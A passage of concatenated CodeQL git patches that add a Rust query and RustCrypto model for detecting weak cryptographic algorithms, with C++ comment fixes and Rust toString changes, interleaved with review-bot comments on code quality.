+ * Names of cryptographic algorithms, separated into strong and weak variants.
+ *
+ * The names are normalized: upper-case, no spaces, dashes or underscores.
+ *
+ * The names are inspired by the names used in real world crypto libraries.
+ *
+ * The classification into strong and weak are based on Wikipedia, OWASP and Google (2021).
+ */
+
+/**
+ * Holds if `name` corresponds to a strong hashing algorithm.
+ */
+predicate isStrongHashingAlgorithm(string name) {
+ name =
+ [
+ // see https://cryptography.io/en/latest/hazmat/primitives/cryptographic-hashes/#blake2
+ // and https://www.blake2.net/
+ "BLAKE2", "BLAKE2B", "BLAKE2S",
+ // see https://github.com/BLAKE3-team/BLAKE3
+ "BLAKE3",
+ //
+ "DSA", "ED25519", "ES256", "ECDSA256", "ES384", "ECDSA384", "ES512", "ECDSA512", "SHA2",
+ "SHA224", "SHA256", "SHA384", "SHA512", "SHA3", "SHA3224", "SHA3256", "SHA3384", "SHA3512",
+ // see https://cryptography.io/en/latest/hazmat/primitives/cryptographic-hashes/#cryptography.hazmat.primitives.hashes.SHAKE128
+ "SHAKE128", "SHAKE256",
+ // see https://cryptography.io/en/latest/hazmat/primitives/cryptographic-hashes/#sm3
+ "SM3",
+ // see https://security.stackexchange.com/a/216297
+ "WHIRLPOOL",
+ ]
+}
+
+/**
+ * Holds if `name` corresponds to a weak hashing algorithm.
+ */
+predicate isWeakHashingAlgorithm(string name) {
+ name =
+ [
+ "HAVEL128", "MD2", "MD4", "MD5", "PANAMA", "RIPEMD", "RIPEMD128", "RIPEMD256", "RIPEMD160",
+ "RIPEMD320", "SHA0", "SHA1"
+ ]
+}
+
+/**
+ * Holds if `name` corresponds to a strong encryption algorithm.
+ */ +predicate isStrongEncryptionAlgorithm(string name) { + name = + [ + "AES", "AES128", "AES192", "AES256", "AES512", "AES-128", "AES-192", "AES-256", "AES-512", + "ARIA", "BLOWFISH", "BF", "ECIES", "CAST", "CAST5", "CAMELLIA", "CAMELLIA128", "CAMELLIA192", + "CAMELLIA256", "CAMELLIA-128", "CAMELLIA-192", "CAMELLIA-256", "CHACHA", "GOST", "GOST89", + "IDEA", "RABBIT", "RSA", "SEED", "SM4" + ] +} + +/** + * Holds if `name` corresponds to a weak encryption algorithm. + */ +predicate isWeakEncryptionAlgorithm(string name) { + name = + [ + "DES", "3DES", "DES3", "TRIPLEDES", "DESX", "TDEA", "TRIPLEDEA", "ARC2", "RC2", "ARC4", "RC4", + "ARCFOUR", "ARC5", "RC5" + ] +} + +/** + * Holds if `name` corresponds to a strong password hashing algorithm. + */ +predicate isStrongPasswordHashingAlgorithm(string name) { + name = ["ARGON2", "PBKDF2", "BCRYPT", "SCRYPT"] +} + +/** + * Holds if `name` corresponds to a weak password hashing algorithm. + */ +predicate isWeakPasswordHashingAlgorithm(string name) { name = "EVPKDF" } + +/** + * Holds if `name` corresponds to a stream cipher. + */ +predicate isStreamCipher(string name) { name = ["CHACHA", "RC4", "ARC4", "ARCFOUR", "RABBIT"] } From eeeb142f0b227682c47ded382d7e7392690cbbd5 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Wed, 4 Dec 2024 14:49:25 +0000 Subject: [PATCH 0843/1267] Rust: Implement the query. --- rust/ql/lib/codeql/rust/Concepts.qll | 29 +++++++++++++++++++ .../security/CWE-327/BrokenCryptoAlgorithm.ql | 14 +++++++-- 2 files changed, 40 insertions(+), 3 deletions(-) diff --git a/rust/ql/lib/codeql/rust/Concepts.qll b/rust/ql/lib/codeql/rust/Concepts.qll index 7e3ec0990ce..070b8a118cc 100644 --- a/rust/ql/lib/codeql/rust/Concepts.qll +++ b/rust/ql/lib/codeql/rust/Concepts.qll 
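Review bot: The dashed entries in `isStrongEncryptionAlgorithm` (`"AES-128"`, `"AES-192"`, `"AES-256"`, `"AES-512"`, `"CAMELLIA-128"`, `"CAMELLIA-192"`, `"CAMELLIA-256"`) contradict the header of `CryptoAlgorithmNames.qll`, which says names are normalized with no dashes. `getBestAlgorithmForName`, earlier in this patch, strips `[-_ ]` from the candidate names before comparing them with `algorithm.getName()`, so these entries look unreachable through `matchesName`. Separately, `isStrongHashingAlgorithm` lists signature schemes (`"DSA"`, `"ED25519"`, `"ES256"`, `"ECDSA256"` and so on) that are not hash functions, and the strong-encryption list contains 64-bit-block ciphers such as `"BLOWFISH"`, `"IDEA"` and `"CAST5"`, which a weak-algorithm query built on these predicates will never report. I would drop the dashed duplicates and put a comment above the remaining groups, for example `// signature schemes, listed here so they are not classified as weak hashes`, so that the classification is a recorded decision rather than an accident of the list.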
@@ -172,3 +172,32 @@ module SqlSanitization { */ abstract class Range extends DataFlow::Node { } } + +/** + * Provides models for cryptographic things. + */ +module Cryptography { + private import codeql.rust.internal.ConceptsShared::Cryptography as SC + + /** + * A data-flow node that is an application of a cryptographic algorithm. For example, + * encryption, decryption, signature-validation. + * + * Extend this class to refine existing API models. If you want to model new APIs, + * extend `CryptographicOperation::Range` instead. + */ + class CryptographicOperation extends SC::CryptographicOperation instanceof CryptographicOperation::Range + { } + + class EncryptionAlgorithm = SC::EncryptionAlgorithm; + + class HashingAlgorithm = SC::HashingAlgorithm; + + class PasswordHashingAlgorithm = SC::PasswordHashingAlgorithm; + + module CryptographicOperation = SC::CryptographicOperation; + + class BlockMode = SC::BlockMode; + + class CryptographicAlgorithm = SC::CryptographicAlgorithm; +} diff --git a/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.ql b/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.ql index 3890d54c03b..3d777b08539 100644 --- a/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.ql +++ b/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.ql @@ -11,7 +11,15 @@ */ import rust +import codeql.rust.Concepts -from int i -where none() -select i +from Cryptography::CryptographicOperation operation, string msgPrefix +where + exists(Cryptography::EncryptionAlgorithm algorithm | algorithm = operation.getAlgorithm() | + algorithm.isWeak() and + msgPrefix = "The cryptographic algorithm " + algorithm.getName() + ) + or + operation.getBlockMode().isWeak() and msgPrefix = "The block mode " + operation.getBlockMode() +select operation, "$@ is broken or weak, and should not be used.", operation.getInitialization(), + msgPrefix From 12b4c0a2dd26dfdf487026ca941b68b6005e4760 Mon Sep 17 00:00:00 2001 
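Review bot: In the `Concepts.qll` hunk, the alias declarations inside `module Cryptography` (`EncryptionAlgorithm`, `HashingAlgorithm`, `PasswordHashingAlgorithm`, `CryptographicOperation`, `BlockMode`, `CryptographicAlgorithm`) carry no QLDoc, unlike the `CryptographicOperation` class above them. Each is part of the public surface that framework models extend, so a one-line comment would help, for example `/** An encryption algorithm, such as DES or AES. */` above `class EncryptionAlgorithm = SC::EncryptionAlgorithm;`. The module comment "Provides models for cryptographic things." could also say what it provides, e.g. `Provides models for cryptographic operations, algorithms and block modes.`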
From: Calum Grant Date: Thu, 5 Dec 2024 15:40:50 +0000 Subject: [PATCH 0844/1267] C++: Change note --- cpp/ql/src/change-notes/2024-12-05-wrong-type-format-args.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 cpp/ql/src/change-notes/2024-12-05-wrong-type-format-args.md diff --git a/cpp/ql/src/change-notes/2024-12-05-wrong-type-format-args.md b/cpp/ql/src/change-notes/2024-12-05-wrong-type-format-args.md new file mode 100644 index 00000000000..df9e13c0704 --- /dev/null +++ b/cpp/ql/src/change-notes/2024-12-05-wrong-type-format-args.md @@ -0,0 +1,4 @@ +--- +category: minorAnalysis +--- +* The "Wrong type of arguments to formatting function" query (`cpp/wrong-type-format-argument`) query no longer produces results when a string type has an extraction error. From ca6d3b003874d6da9d1a726acfe5bbecdd23140f Mon Sep 17 00:00:00 2001 From: Ben Rodes Date: Thu, 5 Dec 2024 10:48:00 -0500 Subject: [PATCH 0845/1267] Update cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll Co-authored-by: Jeroen Ketema <93738568+jketema@users.noreply.github.com> --- cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll index 6d74ccf30ff..bf34ce919ce 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll @@ -9,7 +9,7 @@ private newtype TEdgeKind = TTrueEdge() or // 'true' edge of conditional branch TFalseEdge() or // 'false' edge of conditional branch TCppExceptionEdge() or // Thrown C++ exception - TSehExceptionEdge() or // Thrown C++ exception + TSehExceptionEdge() or // Thrown SEH exception TDefaultEdge() or // 'default' label of switch TCaseEdge(string minValue, string maxValue) { // Case label of switch From 008d58b425e843d0f307537285e357daa710f05c Mon Sep 17 00:00:00 2001 
From: Ben Rodes Date: Thu, 5 Dec 2024 10:48:16 -0500 Subject: [PATCH 0846/1267] Update cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll Co-authored-by: Jeroen Ketema <93738568+jketema@users.noreply.github.com> --- cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll index bf34ce919ce..c442d0e6f57 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll @@ -67,7 +67,7 @@ final class ExceptionEdge = ExceptionEdgeImpl; /** * An "exception" edge, representing the successor of an instruction when that - * instruction's evaluation throws an exception for C++ exceptions + * instruction's evaluation throws a C++ exception. */ class CppExceptionEdge extends ExceptionEdgeImpl, TCppExceptionEdge { final override string toString() { result = "C++ Exception" } From e9ccf37d4d66120b3663ae439f5bfc6bcaa23c39 Mon Sep 17 00:00:00 2001 From: Ben Rodes Date: Thu, 5 Dec 2024 10:48:23 -0500 Subject: [PATCH 0847/1267] Update cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll Co-authored-by: Jeroen Ketema <93738568+jketema@users.noreply.github.com> --- cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll index c442d0e6f57..8c539626f07 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll 
@@ -75,7 +75,7 @@ class CppExceptionEdge extends ExceptionEdgeImpl, TCppExceptionEdge { /** * An "exception" edge, representing the successor of an instruction when that - * instruction's evaluation throws an exception for SEH exceptions + * instruction's evaluation throws an SEH exception. */ class SehExceptionEdge extends ExceptionEdgeImpl, TSehExceptionEdge { final override string toString() { result = "SEH Exception" } From 1fbd75fee3025f06285ff629536ec41fb48b2a38 Mon Sep 17 00:00:00 2001 From: Ben Rodes Date: Thu, 5 Dec 2024 10:48:34 -0500 Subject: [PATCH 0848/1267] Update cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll Co-authored-by: Jeroen Ketema <93738568+jketema@users.noreply.github.com> --- cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll index 8c539626f07..4cbff4e5d32 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll @@ -145,7 +145,7 @@ module EdgeKind { FalseEdge falseEdge() { result = TFalseEdge() } /** - * Gets an instance of the `CppExceptionEdge` class. + * Gets the single instance of the `CppExceptionEdge` class. */ CppExceptionEdge cppExceptionEdge() { result = TCppExceptionEdge() } From 6cbaa73d5802e03d8080f2c44d5bc66387e1fe89 Mon Sep 17 00:00:00 2001 From: Ben Rodes Date: Thu, 5 Dec 2024 10:48:40 -0500 Subject: [PATCH 0849/1267] Update cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll Co-authored-by: Jeroen Ketema <93738568+jketema@users.noreply.github.com> --- cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll index 4cbff4e5d32..487ada46059 100644 
--- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll @@ -150,7 +150,7 @@ module EdgeKind { CppExceptionEdge cppExceptionEdge() { result = TCppExceptionEdge() } /** - * Gets an instance of the `SehExceptionEdge` class. + * Gets the single instance of the `SehExceptionEdge` class. */ SehExceptionEdge sehExceptionEdge() { result = TSehExceptionEdge() } From 3115833847237130fab1c0ef38ffe2cbe505ba39 Mon Sep 17 00:00:00 2001 From: Ben Rodes Date: Thu, 5 Dec 2024 10:49:33 -0500 Subject: [PATCH 0850/1267] Update cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll Co-authored-by: Jeroen Ketema <93738568+jketema@users.noreply.github.com> --- cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll index 487ada46059..3a8ae40694c 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll @@ -58,10 +58,8 @@ abstract private class ExceptionEdgeImpl extends EdgeKindImpl { } * An "exception" edge, representing the successor of an instruction when that * instruction's evaluation throws an exception. * - * Exception edges are expclitly sublcassed to - * `CppExceptionEdge` and `SehExceptionEdge` only. - * Further sublcasses, if required, should be added privately - * here for IR efficiency. + * Exception edges are expclitly sublcassed to `CppExceptionEdge` and `SehExceptionEdge` + * only. Further sublcasses, if required, should be added privately here for IR efficiency. */ final class ExceptionEdge = ExceptionEdgeImpl; From 48c86979f01efd59e5cad6d0111c1ad25575cdc6 Mon Sep 17 00:00:00 2001 
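Review bot: The reflowed QLDoc on `ExceptionEdge` in the `@@ -58,10 +58,8 @@` hunk still carries the misspellings `expclitly`, `sublcassed` and `sublcasses` on its new side. Since the comment is being rewritten anyway, I would correct them in the same change: `* Exception edges are explicitly subclassed to `CppExceptionEdge` and `SehExceptionEdge`` and `* only. Further subclasses, if required, should be added privately here for IR efficiency.`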
From: "REDMOND\\brodes" Date: Thu, 5 Dec 2024 10:50:06 -0500 Subject: [PATCH 0851/1267] Deleting unused predicate. --- cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll | 8 -------- 1 file changed, 8 deletions(-) diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll index 6d74ccf30ff..e0236a566e5 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll @@ -154,14 +154,6 @@ module EdgeKind { */ SehExceptionEdge sehExceptionEdge() { result = TSehExceptionEdge() } - /** - * Gets an instance of the `ExceptionEdge` class. - */ - ExceptionEdge exceptionEdge() { - result = cppExceptionEdge() or - result = sehExceptionEdge() - } - /** * Gets the single instance of the `DefaultEdge` class. */ From 720bfc8ff12cb214d4f584a2c330252ae21b8c83 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Thu, 5 Dec 2024 17:43:47 +0100 Subject: [PATCH 0852/1267] Rust: tweak/define more `toString` implementations --- rust/ql/.generated.list | 2 -- rust/ql/.gitattributes | 2 -- .../codeql/rust/elements/internal/MethodCallExprImpl.qll | 8 +++++++- rust/ql/lib/codeql/rust/elements/internal/StructImpl.qll | 6 ++++-- rust/ql/lib/codeql/rust/elements/internal/VariantImpl.qll | 6 ++++-- 5 files changed, 15 insertions(+), 9 deletions(-) diff --git a/rust/ql/.generated.list b/rust/ql/.generated.list index b13b4bc6db9..264205ee914 100644 --- a/rust/ql/.generated.list +++ b/rust/ql/.generated.list 
@@ -360,7 +360,6 @@ lib/codeql/rust/elements/internal/StmtImpl.qll ea99d261f32592ff368cc3a1960864989 lib/codeql/rust/elements/internal/StmtListConstructor.qll 435d59019e17a6279110a23d3d5dfbc1d1e16fc358a93a1d688484d22a754866 23fcb60a5cbb66174e459bc10bd7c28ed532fd1ab46f10b9f0c8a6291d3e343f lib/codeql/rust/elements/internal/StmtListImpl.qll fc16097d08124bcc39c998b07023710e0152baed165fb134cac2ee27e22a9f7a a4eceb42720593d8d0ce031016465de0bb61d40f31b2cc2718626ef8348ac900 lib/codeql/rust/elements/internal/StructConstructor.qll 52921ea6e70421fd08884dc061d0c2dfbbb8dd83d98f1f3c70572cfe57b2a173 dcb3ea8e45ee875525c645fe5d08e6db9013b86bd351c77df4590d0c1439ab9f -lib/codeql/rust/elements/internal/StructImpl.qll 7e3b58c3038ad7a3315cae34a34f99380e36d33cf3fb4437de6f6dcfed2ad579 1cfcb3bb5381349a2a4074a9e53927f5c540f2b251b187ad28da300968dfc649 lib/codeql/rust/elements/internal/TokenImpl.qll 87629ffee74cacc6e8af5e96e18e62fb0fa4043d3ba1e7360daa880e628f8530 d54e213e39ae2b9bb92ab377dc72d72ba5bca88b72d29032507cdcbef201a215 lib/codeql/rust/elements/internal/TokenTreeConstructor.qll 0be1f838b04ff944560aa477cbe4ab1ad0b3f4ae982de84773faac5902fcae45 254b387adc2e1e3c355651ab958785d0b8babbc0030194234698a1219e9497b3 lib/codeql/rust/elements/internal/TokenTreeImpl.qll c61574f2b551db24640258117e0c8653196ba91392ce81da71a3a528ee07b1ad 489a1c8f550725e28871ae99c41d03b719c3099b8f73ae7422f497430f616267 
@@ -403,7 +402,6 @@ lib/codeql/rust/elements/internal/UseTreeImpl.qll 25e286538c048cc7ee07f4b5a8b77b lib/codeql/rust/elements/internal/UseTreeListConstructor.qll 973577da5d7b58eb245f108bd1ae2fecc5645f2795421dedf7687b067a233003 f41e5e3ffcb2a387e5c37f56c0b271e8dc20428b6ff4c63e1ee42fcfa4e67d0a lib/codeql/rust/elements/internal/UseTreeListImpl.qll 6cac5242f1219df0fe9b3c139db8cc075a2fde618614ca56de2c856130a8ebaa d2ec917055a45f4d07d4ea6dff14298925ae323b165a5bcb6e906f7aad463f82 lib/codeql/rust/elements/internal/VariantConstructor.qll 0297d4a9a9b32448d6d6063d308c8d0e7a067d028b9ec97de10a1d659ee2cfdd 6a4bee28b340e97d06b262120fd39ab21717233a5bcc142ba542cb1b456eb952 -lib/codeql/rust/elements/internal/VariantImpl.qll f5204121f15407ffc0926128239f317cbb9277ee456217940c15d48ba80abd49 4de0a8895d9c08f86fa139007ed009a3a5e1101b9edb40c73c58a4059c318802 lib/codeql/rust/elements/internal/VariantListConstructor.qll c841fb345eb46ea3978a0ed7a689f8955efc9178044b140b74d98a6bcd0c926a c9e52d112abdba2b60013fa01a944c8770766bf7368f9878e6b13daaa4eed446 lib/codeql/rust/elements/internal/VariantListImpl.qll 858f3668f53d8b6aacb2715a59509969fe9fd24c5a2ff0b5ceed8a2441cd9cf7 f2a57b6232247687f529be8e4d2d3d0d4d108221d8a6eb45a69a1bcc0cdc51de lib/codeql/rust/elements/internal/VisibilityConstructor.qll 1fd30663d87945f08d15cfaca54f586a658f26b7a98ea45ac73a35d36d4f65d0 6ddaf11742cc8fbbe03af2aa578394041ae077911e62d2fa6c885ae0543ba53a diff --git a/rust/ql/.gitattributes b/rust/ql/.gitattributes index 40a1492be4d..49142cf2701 100644 --- a/rust/ql/.gitattributes +++ b/rust/ql/.gitattributes 
@@ -362,7 +362,6 @@ /lib/codeql/rust/elements/internal/StmtListConstructor.qll linguist-generated /lib/codeql/rust/elements/internal/StmtListImpl.qll linguist-generated /lib/codeql/rust/elements/internal/StructConstructor.qll linguist-generated -/lib/codeql/rust/elements/internal/StructImpl.qll linguist-generated /lib/codeql/rust/elements/internal/TokenImpl.qll linguist-generated /lib/codeql/rust/elements/internal/TokenTreeConstructor.qll linguist-generated /lib/codeql/rust/elements/internal/TokenTreeImpl.qll linguist-generated @@ -405,7 +404,6 @@ /lib/codeql/rust/elements/internal/UseTreeListConstructor.qll linguist-generated /lib/codeql/rust/elements/internal/UseTreeListImpl.qll linguist-generated /lib/codeql/rust/elements/internal/VariantConstructor.qll linguist-generated -/lib/codeql/rust/elements/internal/VariantImpl.qll linguist-generated /lib/codeql/rust/elements/internal/VariantListConstructor.qll linguist-generated /lib/codeql/rust/elements/internal/VariantListImpl.qll linguist-generated /lib/codeql/rust/elements/internal/VisibilityConstructor.qll linguist-generated diff --git a/rust/ql/lib/codeql/rust/elements/internal/MethodCallExprImpl.qll b/rust/ql/lib/codeql/rust/elements/internal/MethodCallExprImpl.qll index a599feded62..7037f5ebbca 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/MethodCallExprImpl.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/MethodCallExprImpl.qll @@ -20,6 +20,12 @@ module Impl { * ``` */ class MethodCallExpr extends Generated::MethodCallExpr { - override string toString() { result = "... ." + this.getNameRef().toString() + "(...)" } + override string toString() { + exists(string base, string separator | + base = this.getReceiver().toAbbreviatedString() and + (if base = "..." then separator = " ." else separator = ".") and + result = base + separator + this.getNameRef().toString() + "(...)" + ) + } } } 
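Review bot: The new `MethodCallExpr.toString` in `MethodCallExprImpl.qll` has no result whenever `this.getReceiver().toAbbreviatedString()` has none, because the surrounding `exists` then fails; the version it replaces needed only `getNameRef()`. Whether the extractor can emit a method call without a receiver (for instance after a parse error) is not visible from this hunk, but if it can, those nodes lose their textual representation. The `Struct` and `Variant` hunks later in the same commit have the same shape with `this.getName().getText()`. A fallback keeps `toString` total, e.g. `if exists(this.getReceiver()) then base = this.getReceiver().toAbbreviatedString() else base = "..."`.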
diff --git a/rust/ql/lib/codeql/rust/elements/internal/StructImpl.qll b/rust/ql/lib/codeql/rust/elements/internal/StructImpl.qll index ddd1189658d..eca3bfb72fa 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/StructImpl.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/StructImpl.qll @@ -1,4 +1,3 @@ -// generated by codegen, remove this comment if you wish to edit this file /** * This module provides a hand-modifiable wrapper around the generated class `Struct`. * @@ -12,11 +11,14 @@ private import codeql.rust.elements.internal.generated.Struct * be referenced directly. */ module Impl { + // the following QLdoc is generated: if you need to edit it, do it in the schema file /** * A Struct. For example: * ```rust * todo!() * ``` */ - class Struct extends Generated::Struct { } + class Struct extends Generated::Struct { + override string toString() { result = "struct " + this.getName().getText() } + } } diff --git a/rust/ql/lib/codeql/rust/elements/internal/VariantImpl.qll b/rust/ql/lib/codeql/rust/elements/internal/VariantImpl.qll index e58f32e0149..b4f1f326af0 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/VariantImpl.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/VariantImpl.qll @@ -1,4 +1,3 @@ -// generated by codegen, remove this comment if you wish to edit this file /** * This module provides a hand-modifiable wrapper around the generated class `Variant`. * @@ -12,11 +11,14 @@ private import codeql.rust.elements.internal.generated.Variant * be referenced directly. */ module Impl { + // the following QLdoc is generated: if you need to edit it, do it in the schema file /** * A Variant. For example: * ```rust * todo!() * ``` */ - class Variant extends Generated::Variant { } + class Variant extends Generated::Variant { + override string toString() { result = this.getName().getText() } + } } From 94dbad7c95cf532dce9eb6a645ec9b7dee7f81e9 Mon Sep 17 00:00:00 2001 
From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 5 Dec 2024 12:32:25 +0000 Subject: [PATCH 0853/1267] Rust: Model for cipher traits. --- rust/ql/lib/codeql/rust/Frameworks.qll | 1 + .../lib/codeql/rust/frameworks/RustCrypto.qll | 35 +++++++++++++++++++ .../CWE-327/BrokenCryptoAlgorithm.expected | 13 +++++++ .../security/CWE-327/test_cipher.rs | 26 +++++++------- 4 files changed, 62 insertions(+), 13 deletions(-) create mode 100644 rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll diff --git a/rust/ql/lib/codeql/rust/Frameworks.qll b/rust/ql/lib/codeql/rust/Frameworks.qll index 0c6fc573d0f..483056888ec 100644 --- a/rust/ql/lib/codeql/rust/Frameworks.qll +++ b/rust/ql/lib/codeql/rust/Frameworks.qll @@ -3,5 +3,6 @@ */ private import codeql.rust.frameworks.Reqwest +private import codeql.rust.frameworks.RustCrypto private import codeql.rust.frameworks.stdlib.Env private import codeql.rust.frameworks.Sqlx diff --git a/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll b/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll new file mode 100644 index 00000000000..295ce8d9e63 --- /dev/null +++ b/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll 
@@ -0,0 +1,35 @@
+/**
+ * Provides modeling for the `RustCrypto` family of crates (`cipher`, `digest` etc).
+ */
+
+private import rust
+private import codeql.rust.Concepts
+private import codeql.rust.dataflow.DataFlow
+
+/**
+ * An operation that initializes a cipher through the `cipher::KeyInit` or
+ * `cipher::KeyIvInit` trait, for example `Des::new` or `cbc::Encryptor::new`.
+ */
+class StreamCipherInit extends Cryptography::CryptographicOperation::Range, DataFlow::Node {
+ string algorithmName;
+
+ StreamCipherInit() {
+ // a call to `cipher::KeyInit::new`, `cipher::KeyInit::new_from_slice`,
+ // `cipher::KeyIvInit::new` or `cipher::KeyIvInit::new_from_slices`.
+ exists(Path p |
+ this.asExpr().getExpr().(CallExpr).getFunction().(PathExpr).getPath() = p and
+ p.getResolvedCrateOrigin().matches("%/RustCrypto%") and
+ p.getPart().getNameRef().getText() =
+ ["new", "new_from_slice", "new_from_slices"] and
+ algorithmName = p.getQualifier().getPart().getNameRef().getText()
+ )
+ }
+
+ override DataFlow::Node getInitialization() { result = this }
+
+ override Cryptography::CryptographicAlgorithm getAlgorithm() { result.matchesName(algorithmName) }
+
+ override DataFlow::Node getAnInput() { none() }
+
+ override Cryptography::BlockMode getBlockMode() { result = "" }
+}
diff --git a/rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.expected b/rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.expected
index e69de29bb2d..69f0fed8534 100644
--- a/rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.expected
+++ b/rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.expected
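Review bot: In `StreamCipherInit` (new file `RustCrypto.qll`), `algorithmName` is the text of the path qualifier, `p.getQualifier().getPart().getNameRef().getText()`, so the weak-cipher alert depends on how the type is spelled at the call site rather than on the resolved type. A cipher reached through a type alias or a renamed import would presumably not be matched; I would state that limit in the class QLDoc, e.g. `* Note: the algorithm is recognized from the name written in the path, not from the resolved type.`, and add a test case that pins the current behaviour. The class name also says "stream cipher" while its QLDoc example and the DES/RC2/RC5 expectations in this commit cover block ciphers. Finally, `getBlockMode() { result = "" }` would read more clearly as `none()`, matching `getAnInput()`, assuming the empty string is not a valid `BlockMode`, which this hunk does not show.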
@@ -0,0 +1,13 @@ +| test_cipher.rs:20:27:20:48 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:20:27:20:48 | ...::new(...) | The cryptographic algorithm RC4 | +| test_cipher.rs:23:27:23:60 | ...::new_from_slice(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:23:27:23:60 | ...::new_from_slice(...) | The cryptographic algorithm RC4 | +| test_cipher.rs:26:27:26:48 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:26:27:26:48 | ...::new(...) | The cryptographic algorithm RC4 | +| test_cipher.rs:29:27:29:48 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:29:27:29:48 | ...::new(...) | The cryptographic algorithm RC4 | +| test_cipher.rs:59:23:59:42 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:59:23:59:42 | ...::new(...) | The cryptographic algorithm DES | +| test_cipher.rs:63:23:63:47 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:63:23:63:47 | ...::new(...) | The cryptographic algorithm DES | +| test_cipher.rs:67:23:67:46 | ...::new_from_slice(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:67:23:67:46 | ...::new_from_slice(...) | The cryptographic algorithm DES | +| test_cipher.rs:71:23:71:42 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:71:23:71:42 | ...::new(...) | The cryptographic algorithm DES | +| test_cipher.rs:75:27:75:46 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:75:27:75:46 | ...::new(...) | The cryptographic algorithm DES | +| test_cipher.rs:97:23:97:42 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:97:23:97:42 | ...::new(...) | The cryptographic algorithm RC2 | +| test_cipher.rs:101:23:101:46 | ...::new_from_slice(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:101:23:101:46 | ...::new_from_slice(...) 